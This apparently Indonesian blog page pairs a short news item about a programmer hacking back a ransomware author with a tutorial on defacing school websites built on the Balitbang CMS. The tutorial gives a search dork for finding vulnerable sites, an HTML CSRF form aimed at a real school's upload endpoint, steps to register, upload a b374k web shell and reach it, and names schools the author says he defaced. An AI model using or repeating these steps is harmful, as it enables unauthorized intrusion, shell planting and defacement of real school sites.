Ransomware adalah salah satu jenis malware yang dapat mengenkripsi semua file yang ada dikomputer korban sehingga tidak bisa diakses sama sekali. Untuk mengembalikannya, korban harus membayar sejumlah uang dalam bentuk Bitcoin.
Baru-baru ini seorang programmer bernama Tobias Fromel menjadi korban penyerangan ransomware oleh seorang hacker. Diketahui bahwa seluruh file yang terdapat di komputer Tobias langsung terenkripsi.
Alhasil Tobias terpaksa harus membayar uang tebusan sebesar USD700 atau setara dengan Rp9,8 Jutaan dalam bentuk mata uang digital Bitcoin. Namun setelah membayar uang tebusan tersebut, Tobias melancarkan aksi balas dendamnya.
Diketahui bahwa Tobias langsung meretas server dari pembuat ransomware tersebut dan berhasil mengambil kunci dekripsi untuk ransomware tersebut. Tobias kemudian menyebarkan kunci dekripsi tersebut ke situs Pastebin agar korban ransomware lainnya tidak perlu membayar uang tebusan.
Namun Tobias mengatakan bahwa meskipun ia berhasil membalas dendamnya dengan meretas balik pembuat ransomware tersebut, hal itu seharusnya tidak dilakukan karena meretas layanan orang lain adalah sebuah hal yang ilegal.
Rabu, 16 Oktober 2019
Minggu, 06 Januari 2019
DEFACE METODE CSRF BALITBANG
Oke Gan Gue Kali ini Mau Share Tentang Deface Web Sekolah Dengan CRSF Balitbang,,Sebenernya Tehnik Ini Udah Jadul Tapi Kalo Bisa Dorking Mah Tetep Masih Banyak Web Yangg Vuln :v
Bahan :
1. Internet
2. Kopi
3. Roko
Pertama" Kita Ngedork Dlu ,, Dork Yang Sering Gw Pake :
1. : inurl:member/Daftar.php intext:namakota <== Bisa di kembangin Lagi :)
Kedua Buat Lah CSRF Nya Dlu Gan :
2. </head> <br><br><br><br><br><br><br><br><br><br><br><br><br> <body> <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'> <center><font face="Iceland"><font size="7" color=Green>Root ./51N1CH1 Java Intelegent Cyber</font></center> <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'> <center><form enctype="multipart/form-data" action="http://smkcitramutiara.sch.id/functions/simmateriguru.php" method="post"></center>
<center><input name="file" type="file"><input type="submit" value="Upload"></center>
Ganti Http Nya Dengan Web Yang Sudah Kalian Eksekusi
Dan Jika Kalian Mau Upload Shell
1. Shell.php <== Bisa di cari di Google :)
Oke Udah siap Bahan Kita Lanjut Eksekusi :v
1.Searching di Google atau Yg lain dengan Menggunakan Dork di atas
2.Pilih Salah Satu Web Yg Kira" Vuln saya Ambil contoh : http://smpn48sby.sch.id/
3.Pastikan Anda di http://smpn48sby.sch.id/member/daftar.php
4.isikan Data terserah anda kecuali Alamat Email dan
Password Harus benar dan di ingat Karena Nanti akan di gunakan Untuk Login Member
5. Apabila Sudah Semua Klik Simpan
6.Lalu Cek Email Kamu Apabila ada Balasan dari web yg kamu isi tadi Klik Validasi
7.apabila Belum di Patch Atau di Hek Orang lain muncul Login Member Lalu isi User dan Pass Yg anda isi kan tadi
8.Apabila Sudah Masuk Sebagai Member Copy Paste Target ke CSRF yg anda Copy Ke Dalam Notepad yg ber ekstensi .html Contoh : http://smpn48sby.sch.id/
9.Buka CSRF Anda Dengan Mozilla Atau yg Lain Apabila Sudah Muncul Klik Browse pilih Shell yg Mw Kamu Upload :) Lalu Klik Upload
10.Shell Akses : materi/file.php <== Semua Shell yg bernama b374k.php Apabila di upload Jdi file.php
11.Apabila Tidak Muncul Shell Kalian Silahkan Ganti Target :v Karena Sudah di Patch .. Biasanya Faktor Face Anda
Sedikit Target Yg Saya Deface :
http://smpn48sby.sch.id/
http://www.sdn6palelehbarat.sch.id/ http://www.sdn10palelehbarat.sch.id/
Quote:tidak semua Web bisa Menggunakan Tehnik Deface Ini :) Dan Ini Hanyalah sebagai Media
Thanks Too Mr.Shadow404
All Member Garuda Security Hacker
Langganan:
Komentar (Atom)